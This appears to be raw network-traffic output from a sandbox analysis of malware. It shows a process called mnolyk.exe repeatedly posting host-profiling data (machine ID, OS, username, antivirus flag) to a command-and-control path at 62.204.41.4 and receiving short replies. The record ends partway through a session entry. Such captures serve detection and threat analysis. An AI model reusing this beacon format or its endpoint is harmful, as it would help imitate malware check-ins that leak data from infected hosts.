Feb 7, 2023 20:00:30.868607044 CET	983	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
739	192.168.2.5	50452	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:31.039413929 CET	984	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:31.103657961 CET	984	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.5	49780	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:25.243031979 CET	265	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:25.311461926 CET	266	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
740	192.168.2.5	50453	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:31.268227100 CET	985	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:31.332623005 CET	985	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
741	192.168.2.5	50454	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:31.504096031 CET	986	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:31.569017887 CET	986	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
742	192.168.2.5	50455	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:31.736850977 CET	987	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:31.799894094 CET	987	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
743	192.168.2.5	50457	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:31.981578112 CET	994	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:32.048803091 CET	995	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
744	192.168.2.5	50458	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:32.245201111 CET	996	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:32.309118032 CET	996	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
745	192.168.2.5	50459	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:32.490578890 CET	997	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:32.555351019 CET	997	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
746	192.168.2.5	50460	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:32.743841887 CET	998	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:32.806299925 CET	998	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
747	192.168.2.5	50461	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:32.989437103 CET	999	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:33.055789948 CET	999	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
748	192.168.2.5	50462	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:33.222234964 CET	999	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:33.285778999 CET	1000	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
749	192.168.2.5	50463	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:33.458703995 CET	1001	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:33.523138046 CET	1001	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.5	49782	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:25.569842100 CET	273	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:25.635299921 CET	273	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
750	192.168.2.5	50464	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:33.699107885 CET	1002	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:33.763662100 CET	1002	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
751	192.168.2.5	50465	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:33.942200899 CET	1003	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:34.005801916 CET	1003	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
752	192.168.2.5	50466	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:34.175410986 CET	1004	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:34.241656065 CET	1004	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
753	192.168.2.5	50467	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:34.410743952 CET	1005	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:34.475270033 CET	1005	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
754	192.168.2.5	50468	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:34.647098064 CET	1006	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:34.711626053 CET	1006	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
755	192.168.2.5	50469	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:34.879329920 CET	1007	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:34.946151018 CET	1007	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
756	192.168.2.5	50470	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:35.113671064 CET	1008	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:35.180619955 CET	1008	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.5	49783	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:27.313900948 CET	274	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:27.405699015 CET	274	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.5	49784	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
